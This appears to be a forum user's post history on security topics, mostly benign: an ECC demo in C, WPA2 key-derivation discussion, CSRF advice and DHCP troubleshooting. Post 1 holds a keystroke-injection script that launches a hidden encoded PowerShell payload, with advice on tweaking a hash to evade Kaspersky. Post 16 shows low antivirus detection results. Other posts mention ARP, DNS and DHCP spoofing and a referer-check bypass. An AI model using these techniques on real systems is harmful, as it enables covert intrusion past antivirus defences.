fugu

Posts posted by fugu

  1. This is untested, but I rewrote the hashing that your exploit is using. Instead of the ror13 hash that was being used, I changed it to ror12. On VirusTotal now, Kaspersky is unable to detect it, but it could be because I created a bug that I don't know about in the process; like I said, I haven't tested it.

    DELAY 5000
    GUI r
    DELAY 1000
    STRING cmd
    ENTER
    DELAY 1000
    STRING powershell -nop -win hidden -noni -enc [base64-encoded payload removed]
    ENTER

     

  2. I know a really ugly way to do this, it kinda works but is going to throw some errors in the process. you create a .bat file like auto.bat:

    #/bin/sh
    goto label0
    ./MacOSX_program
    exit 0
    :label0
    .\Windows_program.exe

    The Windows OS will see that the filename has a .bat extension. It doesn't know what #/bin/sh means so it throws an error, but continues on. It follows the goto to label0 and then runs the Windows_program.exe.

    Mac OS will ignore the .bat extension, but read #/bin/sh as a shell script. It will error on the goto, but continue on to run the MacOSX_program.

  3. 22 hours ago, kerravon said:

    didn't I see somewhere in the distant past rainbow tables created to do just this?
    maybe I was dreaming again, old age does that to you.

    A while back I was looking into creating a program that would create a rainbow-table-like set of tables that would handle WPA2/HMAC/SHA1, and I probably could have started making one, but the major problem with it is that the keyspace size is way too large. This is referred to as a Time Memory Trade Off: the less time you want it to take, the more memory your tables are going to take up on the hard drive. For WPA2 the keyspace is going to be based on the PASSPHRASE that was used, plus SSID, plus a random number called the ANONCE, plus a random number called the SNONCE. Even if you knew what the passphrase was, and you created a table for ssid and the 2 nonces, it would be really large. My thinking is that it would probably be impractical to create a full set of TMTO tables to completely crack WPA2.
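
    Added example (not part of the original post): a Python sketch of where each input named above enters WPA2-PSK key derivation as defined in IEEE 802.11i. The passphrase and SSID feed PBKDF2 to produce the PMK, while the MAC addresses and the two nonces enter only when the PTK is expanded. The function names, MAC addresses, nonces, SSIDs and passphrase are constructed for illustration.

```python
import hashlib
import hmac


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce, length=64):
    """PTK = PRF(PMK, "Pairwise key expansion", sorted MACs || sorted nonces)."""
    label = b"Pairwise key expansion"
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out, counter = b"", 0
    while len(out) < length:
        block = label + b"\x00" + data + bytes([counter])
        out += hmac.new(pmk, block, hashlib.sha1).digest()
        counter += 1
    return out[:length]


# Constructed sample values, not taken from any capture
AP_MAC = bytes.fromhex("020000000001")
STA_MAC = bytes.fromhex("020000000002")
ANONCE_1 = bytes(range(32))
SNONCE_1 = bytes(range(32, 64))
SNONCE_2 = bytes(range(64, 96))


def show_dependencies(passphrase="correct horse battery staple"):
    """Report which derived key changes when the SSID or a nonce changes."""
    pmk_home = derive_pmk(passphrase, "HomeNet")
    pmk_cafe = derive_pmk(passphrase, "CafeNet")
    ptk_a = derive_ptk(pmk_home, AP_MAC, STA_MAC, ANONCE_1, SNONCE_1)
    ptk_b = derive_ptk(pmk_home, AP_MAC, STA_MAC, ANONCE_1, SNONCE_2)
    return {
        "pmk_changes_with_ssid": pmk_home != pmk_cafe,
        "ptk_changes_with_nonce": ptk_a != ptk_b,
        "pmk_len": len(pmk_home),
        "ptk_len": len(ptk_a),
    }


if __name__ == "__main__":
    print(show_dependencies())
```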

  4. In many of the documents that I've been looking over, they talk about many of these things in terms of the mathematics, and I tend to see the same single letter variables being used over and over again. Some references will use different letters so it's not always constant, but I was primarily going off of the site http://www.johannes-bauer.com/compsci/ecc/ for a majority of the concepts. The functions for point addition, point doubling, and scalar multiplication were pulled directly from "Implementation of Elliptic Curve Cryptography in C" by Kuldeep Bhardwaj and Sanjay Chaudhary, appendix A.

  5.  

    So this is a little demo I've been working on that plays around with ECC Point Mathematics & encryption. Many of the demos I've found have been not functional from beginning to end, and although this is not going to be a secure version of ECC, it does demo some of the basic properties of it. I'm using pieces of existing code, along with my own to get it working.

    Individual ECC curve properties as well as the public key/private key pair can be created with openssl:

    CRYPTNAME=secp192k1 && openssl ecparam -name $CRYPTNAME -out $CRYPTNAME.pem && openssl ecparam -in $CRYPTNAME.pem -noout -text -C && openssl ecparam -in $CRYPTNAME.pem -genkey -noout -out $CRYPTNAME-key.pem && openssl ec -in $CRYPTNAME-key.pem -noout -text && rm -f $CRYPTNAME.pem $CRYPTNAME-key.pem

    In real ECIES, a common point is derived on both the sender's end, as well as the receiver's end, which is used to agree upon a symmetric key. Normally something like AES is used to encrypt the message with this key, but I'm just xor'ing the message to keep the example small.

    Here it is:

    #include<stdio.h>
    #include<stdlib.h>
    #include<string.h>
    #include<gmp.h>
    #include<time.h>
    
    struct Point{
    	mpz_t x;
    	mpz_t y;
    };
    
    struct Elliptic_Curve{
    	mpz_t a;	//y^2 = x^3 + a*x + b
    	mpz_t b;
    	mpz_t p;
    	mpz_t n;	//Order
    	struct Point G;	//Base Point
    	mpz_t h;	//Cofactor
    };
    
    void Point_Addition(struct Elliptic_Curve EC, struct Point P,struct Point Q, struct Point *R);
    void Point_Doubling(struct Elliptic_Curve EC, struct Point P,struct Point *R);
    void Scalar_Multiplication(struct Elliptic_Curve EC, mpz_t m, struct Point P, struct Point *R);
    
    int main(int argc, char * argv[]){
    	srand(time(NULL)); //not crypto secure
    	struct Elliptic_Curve secp192k1;
    
    	mpz_init(secp192k1.a);
    	mpz_init(secp192k1.b);
    	mpz_init(secp192k1.p);
    	mpz_init(secp192k1.n);
    	mpz_init(secp192k1.G.x);
    	mpz_init(secp192k1.G.y);
    	mpz_init(secp192k1.h);
    
    	mpz_set_str(secp192k1.a,"0", 16); //Elliptic Curve secp192k1 (Koblitz curve, not NIST P-192)
    	mpz_set_str(secp192k1.b,"3", 16);
    	mpz_set_str(secp192k1.p,"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFEE37", 16);
    	mpz_set_str(secp192k1.n,"FFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D", 16);
    	mpz_set_str(secp192k1.G.x,"DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D", 16);
    	mpz_set_str(secp192k1.G.y,"9B2F2F6D9C5628A7844163D015BE86344082AA88D95E2F9D", 16);
    	mpz_set_str(secp192k1.h,"1", 16);
    
    	mpz_t da;		//priv
    	struct Point Qa;	//pub
    
    	mpz_init(da);
    	mpz_init(Qa.x);
    	mpz_init(Qa.y);
    
    	mpz_set_str(da,  "e03a7a761dc3f4b5ff363906af1a1bfb97e1cbfc837834ed", 16); //private key, a random integer from "0" to "n"
    	mpz_set_str(Qa.x,"8d4af03e8368921895af8c777fac221439604811d2359249", 16); //public key x
    	mpz_set_str(Qa.y,"6f35647c10df80325be5cc48c5a2a218525db549d3d5839c", 16); //public key y
    
    	mpz_t encoded_message;
    	mpz_init(encoded_message);
    
    	mpz_set_ui(encoded_message,0);
    
    	unsigned char ary[] = "Hello World! 1234567890";
    	mpz_import(encoded_message, sizeof(ary), 1, sizeof(ary[0]), 1, 0, (const void *)ary);
    	printf("#############################################################################\nary = %s\n", ary);
    
    	struct Point R;
    	mpz_init(R.x);
    	mpz_init(R.y);
    
    	struct Point S;
    	mpz_init(S.x);
    	mpz_init(S.y);
    
    	mpz_t r;
    	mpz_init(r);
    
    	gmp_randstate_t state;
    	gmp_randinit_mt(state);
    	gmp_randseed_ui(state,rand());
    	mpz_urandomm(r,state,secp192k1.n);
    
    	Scalar_Multiplication(secp192k1, r, secp192k1.G, &R);
    	//R = r*G
    	Scalar_Multiplication(secp192k1, r, Qa, &S);
    	//S = r*Qa
    
    	mpz_t e;
    	mpz_init(e);
    	mpz_xor(e,S.x,S.y);		//My simplified variant of the symmetric encryption part, not standard for real ECIES, probably insecure
    	mpz_xor(e,e,encoded_message);	//ciphertext = S.x ^ S.y ^ cleartext 
    
    	gmp_printf("Qa.x = %Zx //Point Qa is the PUBLIC_KEY\nQa.y = %Zx\n", Qa.x, Qa.y);
    	gmp_printf("Ciphertext Message => Rx = %Zx //Point R is the CHOOSEN_POINT\nCiphertext Message => Ry = %Zx\n", R.x, R.y);
    	gmp_printf("Ciphertext Message =>  e = %Zx\n", e);
    
    	//Only Rx, Ry, and e get sent over the wire
    	printf("Decrypt 'e' From da && R... //da is the PRIVATE_KEY\n");
    
    	struct Point newS;
    	mpz_init(newS.x);
    	mpz_init(newS.y);
    
    	Scalar_Multiplication(secp192k1, da, R, &newS);
    
    	mpz_t decoded_message;
    	mpz_init(decoded_message);
    	mpz_xor(decoded_message,newS.x,newS.y);	
    	mpz_xor(decoded_message,decoded_message,e);	
    	
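    	//One byte per exported byte plus a guaranteed terminating NUL, so printf("%s") never reads past the buffer
    	size_t result_len = (mpz_sizeinbase(decoded_message,2)+7)/8;
    	unsigned char *result = (unsigned char *)calloc(result_len+1, sizeof(unsigned char));

    	mpz_export(result, NULL, 1, sizeof(result[0]), 1, 0, decoded_message);
    	printf("dec = %s\n\n", result);
    	free(result);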
    
    	mpz_clear(secp192k1.a);
    	mpz_clear(secp192k1.b);
    	mpz_clear(secp192k1.p);
    	mpz_clear(secp192k1.n);
    	mpz_clear(secp192k1.G.x);
    	mpz_clear(secp192k1.G.y);
    	mpz_clear(secp192k1.h);
    	mpz_clear(R.x);
    	mpz_clear(R.y);
    	mpz_clear(S.x);
    	mpz_clear(S.y);
    	mpz_clear(newS.x);
    	mpz_clear(newS.y);
    	mpz_clear(da);
    	mpz_clear(e);
    	mpz_clear(r);
    	mpz_clear(encoded_message);
    	mpz_clear(decoded_message);
    	mpz_clear(Qa.x);
    	mpz_clear(Qa.y);
    	return 0;
    }
    
    void Point_Addition(struct Elliptic_Curve EC, struct Point P,struct Point Q,struct Point *R){
    	mpz_mod(P.x,P.x,EC.p);
    	mpz_mod(P.y,P.y,EC.p);
    	mpz_mod(Q.x,Q.x,EC.p);
    	mpz_mod(Q.y,Q.y,EC.p);
    	mpz_t temp,slope;
    	mpz_init(temp);
    	mpz_init_set_ui(slope,0);
    	if(mpz_cmp_ui(P.x,0)==0 && mpz_cmp_ui(P.y,0)==0){
    		mpz_set(R->x,Q.x); mpz_set(R->y,Q.y);
    		return;
    	}
    	if(mpz_cmp_ui(Q.x,0)==0 && mpz_cmp_ui(Q.y,0)==0){
    		mpz_set(R->x,P.x);
    		mpz_set(R->y,P.y);
    		return;
    	}
    	if(mpz_cmp_ui(Q.y,0)!=0){
    		mpz_sub(temp,EC.p,Q.y);
    		mpz_mod(temp,temp,EC.p);
    	}else
    		mpz_set_ui(temp,0);
    	if(mpz_cmp(P.y,temp)==0 && mpz_cmp(P.x,Q.x)==0){
    		mpz_set_ui(R->x,0);
    		mpz_set_ui(R->y,0);
    		return;
    	}
    	if(mpz_cmp(P.x,Q.x)==0 && mpz_cmp(P.y,Q.y)==0){
    		Point_Doubling(EC,P,R);
    		return;
    	}else{
    		mpz_sub(temp,P.x,Q.x);
    		mpz_mod(temp,temp,EC.p);
    		mpz_invert(temp,temp,EC.p);
    		mpz_sub(slope,P.y,Q.y);
    		mpz_mul(slope,slope,temp);
    		mpz_mod(slope,slope,EC.p);
    		mpz_mul(R->x,slope,slope);
    		mpz_sub(R->x,R->x,P.x);
    		mpz_sub(R->x,R->x,Q.x);
    		mpz_mod(R->x,R->x,EC.p);
    		mpz_sub(temp,P.x,R->x);
    		mpz_mul(R->y,slope,temp);
    		mpz_sub(R->y,R->y,P.y);
    		mpz_mod(R->y,R->y,EC.p);
    		return;
    	}
    }
    
    void Point_Doubling(struct Elliptic_Curve EC, struct Point P,struct Point *R){
    	mpz_t slope,temp;
    	mpz_init(temp);
    	mpz_init(slope);
    	if(mpz_cmp_ui(P.y,0)!=0){
    		mpz_mul_ui(temp,P.y,2);
    		mpz_invert(temp,temp,EC.p);
    		mpz_mul(slope,P.x,P.x);
    		mpz_mul_ui(slope,slope,3);
    		mpz_add(slope,slope,EC.a);
    		mpz_mul(slope,slope,temp);
    		mpz_mod(slope,slope,EC.p);
    		mpz_mul(R->x,slope,slope);
    		mpz_sub(R->x,R->x,P.x);
    		mpz_sub(R->x,R->x,P.x);
    		mpz_mod(R->x,R->x,EC.p);
    		mpz_sub(temp,P.x,R->x);
    		mpz_mul(R->y,slope,temp);
    		mpz_sub(R->y,R->y,P.y);
    		mpz_mod(R->y,R->y,EC.p);
    	}else{
    		mpz_set_ui(R->x,0);
    		mpz_set_ui(R->y,0);
    	}
    	
    }
    
    void Scalar_Multiplication(struct Elliptic_Curve EC, mpz_t m, struct Point P, struct Point *R){
    	struct Point Q,T;
    	mpz_init(Q.x);
    	mpz_init(Q.y);
    	mpz_init(T.x);
    	mpz_init(T.y);
    	long no_of_bits,loop;
    	no_of_bits=mpz_sizeinbase(m,2);
    	mpz_set_ui(R->x,0);
    	mpz_set_ui(R->y,0);
    	if(mpz_cmp_ui(m,0)==0)
    		return;
    	mpz_set(Q.x,P.x);
    	mpz_set(Q.y,P.y);
    	if(mpz_tstbit(m,0)==1){
    		mpz_set(R->x,P.x);
    		mpz_set(R->y,P.y);
    	}
    	for(loop=1;loop<no_of_bits;loop++){
    		mpz_set_ui(T.x,0);
    		mpz_set_ui(T.y,0);
    		Point_Doubling(EC,Q,&T);
    		mpz_set(Q.x,T.x);
    		mpz_set(Q.y,T.y);
    		mpz_set(T.x,R->x);
    		mpz_set(T.y,R->y);
    		if(mpz_tstbit(m,loop))
    			Point_Addition(EC,T,Q,R);
    	}
    }
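
    Added example (not fugu's code): the demo above multiplies the received point R by the private key without checking it, so this Python sketch shows the public-point validation a receiver would normally run first, using the same secp192k1 parameters. The function names are my own, the key pair is generated fresh rather than taken from the post, and the point at infinity is represented as None instead of the (0, 0) convention used in the C code.

```python
import secrets

# secp192k1 domain parameters, the same values the C demo loads with mpz_set_str
P = 2**192 - 2**32 - 2**12 - 2**8 - 2**7 - 2**6 - 2**3 - 1
A, B = 0, 3
N = 0xFFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D
G = (0xDB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D,
     0x9B2F2F6D9C5628A7844163D015BE86344082AA88D95E2F9D)
INF = None  # point at infinity, kept distinct from the coordinates (0, 0)

def on_curve(pt):
    """True only for an affine point in range that satisfies y^2 = x^3 + A*x + B."""
    if pt is INF:
        return False
    x, y = pt
    return 0 <= x < P and 0 <= y < P and (y * y - (x ** 3 + A * x + B)) % P == 0

def add(p1, p2):
    """Affine point addition; covers infinity, inverse points and doubling."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return INF
    if p1 == p2:
        s = (3 * x1 * x1 + A) * pow(2 * y1 % P, -1, P) % P
    else:
        s = (y2 - y1) * pow((x2 - x1) % P, -1, P) % P
    x3 = (s * s - x1 - x2) % P
    return (x3, (s * (x1 - x3) - y1) % P)

def mul(k, pt):
    """Double-and-add scalar multiplication (not constant time)."""
    acc = INF
    while k:
        if k & 1:
            acc = add(acc, pt)
        pt = add(pt, pt)
        k >>= 1
    return acc

def shared_point(private_key, peer_point):
    """Validate the peer's point, then compute private_key * peer_point."""
    if not on_curve(peer_point) or mul(N, peer_point) is not INF:
        raise ValueError("peer point is not a valid secp192k1 point")
    return mul(private_key, peer_point)

def demo():
    d = secrets.randbelow(N - 1) + 1          # receiver private key (constructed)
    Q = mul(d, G)                             # receiver public key
    r = secrets.randbelow(N - 1) + 1          # sender's ephemeral scalar
    R = mul(r, G)                             # sent alongside the ciphertext
    agreed = mul(r, Q) == shared_point(d, R)  # both ends reach the same S
    try:
        shared_point(d, (R[0], (R[1] + 1) % P))  # R with its y coordinate altered
        rejected = False
    except ValueError:
        rejected = True
    return agreed, rejected

if __name__ == "__main__":
    print(demo())
```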

     

  6. https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

    Quote

    Checking The Referer Header

    If the Origin header is not present, verify the hostname in the Referer header matches the site's origin. Checking the referer is a commonly used method of preventing CSRF on embedded network devices because it does not require a per-user state. This makes a referer a useful method of CSRF prevention when memory is scarce or server-side state doesn't exist. This method of CSRF mitigation is also commonly used with unauthenticated requests, such as requests made prior to establishing a session state which is required to keep track of a synchronization token.

    In both cases, just make sure your origin check is strong. For example, if your site is "site.com" make sure "site.com.attacker.com" doesn't pass your origin check (i.e., match through the trailing / after the origin to make sure you are matching against the entire origin).

    I think this is the solution to that challenge, if I'm not mistaken.
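
    Added example (not part of the original post or of the OWASP text): the quoted advice implemented in Python, with a prefix match that lets "site.com.attacker.com" through next to a check that compares the entire origin. The https://site.com deployment, the function names and the sample headers are assumptions constructed for illustration; rejecting requests that carry neither header is also a policy assumption.

```python
from urllib.parse import urlsplit

SITE_ORIGIN = "https://site.com"  # hypothetical deployment of the quoted "site.com"
DEFAULT_PORTS = {"http": 80, "https": 443}


def prefix_check(referer):
    """Weak check: string prefix match with no trailing "/" after the origin."""
    return referer.startswith(SITE_ORIGIN)


def origin_tuple(url):
    """Return (scheme, host, port) for an http(s) URL, or None if it cannot be parsed."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return None
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    return (parts.scheme, parts.hostname.lower(), port or DEFAULT_PORTS[parts.scheme])


def strict_check(origin_header, referer_header):
    """Prefer Origin, fall back to Referer, and compare the entire origin."""
    source = origin_header or referer_header
    if not source:
        return False  # assumption: requests with neither header are refused
    return origin_tuple(source) == origin_tuple(SITE_ORIGIN)


# Constructed sample requests: (Origin header, Referer header)
SAMPLES = [
    (None, "https://site.com/settings"),
    ("https://site.com", None),
    (None, "https://site.com.attacker.com/settings"),
    (None, "http://site.com/settings"),
    (None, None),
]


def evaluate(samples=SAMPLES):
    """Return (prefix_check result, strict_check result) for each sample."""
    return [(bool(ref and prefix_check(ref)), strict_check(org, ref))
            for org, ref in samples]


if __name__ == "__main__":
    for sample, result in zip(SAMPLES, evaluate()):
        print(sample, "prefix=%s strict=%s" % result)
```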

  7. doesn't ereg and eregi use regular expressions? If you have control of what will end up in the referrer field, couldn't you try and make the referrer a very widely encompassing regex like .* or something? I'm not sure the * is valid in the hostname location but maybe you can figure something out.

  8. The only way to know for sure what your external ip is (for the network you're connected up to), is to send out a request and have the destination server tell you what your ip is. This has a lot of legitimate uses; NoScript's ABE uses this to help protect your browser. You might consider looking at dynamic dns as a solution to what you're trying to do. There is software that is used on desktop machines to keep the external ip address of your home network associated with a dns entry, so that if you ever want to log into your home network when you're away, you can just use your own dns to do so.

  9. I don't know if you have the ability to modify the code, but if you can, adding

    echo "<pre><code>"; var_dump($_SERVER); echo "</code></pre>";

    will let you examine all the various header entries that are stored in the $_SERVER variable during your request.

  10. Implementation of Elliptic Curve Cryptography in 'C'
    http://www.researchtrend.net/ijet32/6%20KULDEEP%20BHARDWAJ.pdf
    Elliptic Curve Cryptography: Algorithms and Implementation Analysis over Coordinate Systems
    http://www.researchgate.net/profile/Iskandar_Setiadi/publication/268688957_Elliptic_Curve_Cryptography_Algorithms_and_Implementation_Analysis_over_Coordinate_Systems/links/5474337a0cf29afed60f6340.pdf

  11. I've been looking for a new debugger for a while now. My previous debugger of choice for Windows was OllyDbg, which is the very first debugger I started with, but it's so outdated, and when I hop OSes (non-Windows) it is not compatible. In Linux I tend to just use gdb, but it's more designed for the command line, and it's nice to be able to look at the disassembled code, registers and stack all at the same time; imo it makes it easier to see what's going on. The debugger that looks most promising (to me) is IDA Pro; it's available in multiple architectures, and I think it can even debug remotely to Android devices, but it's not FOSS, which is a bit of a letdown. IDA Pro seems to ultimately be the way to go, but I was wondering if anyone knew of any open source alternatives to a multi-platform debugger?

  12. if you have access to a computer with nmap:

    $ sudo nmap -sU -n --script=dhcp-discover -p 67 192.168.2.0/24
    $ sudo nmap -sU -n --script=dhcp-discover -p 67 172.16.42.0/24
    
    I think this will display info about any dhcp servers on the 2 networks 192.168.2.0-255 and 172.16.42.0-255

    It's possible that these 2 network ranges overlap each other

    Edit: changed to new ip ranges

  13. It's not! It's a USB power meter.

    That's good to know. The way I had read the description it sounded like it might have the capability of logging bytes of data traveling over the wire. Now that I reread it, I can see that it's not what it does, that it's able to record power data. Thank you.

  14. Automatic IP designation is usually done via Dynamic Host Configuration Protocol (DHCP), for computers in general. There might be several things that could be going wrong. One thing I can think of is that you have 2 dhcp servers on your network that are trying to dish out info and they are competing. Another possibility is there just happens to be another open wifi network nearby that you are sometimes connecting to instead of your pineapple.

  15. From what I understand about Windows firewall, it does a great job at ingress filtering of data packets coming in, but you might be able to get some data about the OS from the packets leaving the vm. p0f will fingerprint the OS if you can look at the TCP-SYN packets leaving the computer. There are probably several ways you can get some traffic from it to start sniffing for a syn packet. arpspoof is what first comes to mind. You could do dns spoofing, and because you're on the same subnet, dhcp spoofing would be really easy. I'm sure there are other ways too, those were just off the top of my head.

  16. can you show virus scan results?

    SHA256: 	525dd24ac394e238404fe08504891bab80168c80fba1e396827a8683b697845c
    File name: 	test.exe
    Detection ratio: 	5 / 56
    Analysis date: 	2016-04-27 04:09:53 UTC ( 1 minute ago )
    
    Antivirus 	Result 	Update
    Avira (no cloud) 	TR/Crypt.XPACK.Gen 	20160426
    NANO-Antivirus 	Virus.Win32.Gen.ccmw 	20160427
    Qihoo-360 	HEUR/QVM20.1.0000.Malware.Gen 	20160427
    Sophos 	Mal/EncPk-ND 	20160427
    VBA32 	Heur.Trojan.Hlux 	20160425
    ALYac 		20160427
    AVG 		20160427
    AVware 		20160427
    Ad-Aware 		20160427
    AegisLab 		20160426
    AhnLab-V3 		20160426
    Alibaba 		20160426
    Antiy-AVL 		20160427
    Arcabit 		20160427
    Avast 		20160427
    Baidu 		20160426
    Baidu-International 		20160426
    BitDefender 		20160427
    Bkav 		20160427
    CAT-QuickHeal 		20160427
    CMC 		20160425
    ClamAV 		20160426
    Comodo 		20160426
    Cyren 		20160427
    DrWeb 		20160427
    ESET-NOD32 		20160427
    Emsisoft 		20160427
    F-Prot 		20160427
    F-Secure 		20160427
    Fortinet 		20160425
    GData 		20160427
    Ikarus 		20160426
    Jiangmin 		20160427
    K7AntiVirus 		20160426
    K7GW 		20160427
    Kaspersky 		20160427
    Kingsoft 		20160427
    Malwarebytes 		20160427
    McAfee 		20160427
    McAfee-GW-Edition 		20160427
    eScan 		20160427
    Microsoft 		20160427
    Panda 		20160426
    Rising 		20160427
    SUPERAntiSpyware 		20160427
    Symantec 		20160427
    Tencent 		20160427
    TheHacker 		20160426
    TrendMicro 		20160427
    TrendMicro-HouseCall 		20160427
    VIPRE 		20160427
    ViRobot 		20160427
    Yandex 		20160426
    Zillya 		20160426
    Zoner 		20160427
    nProtect 		20160426 
    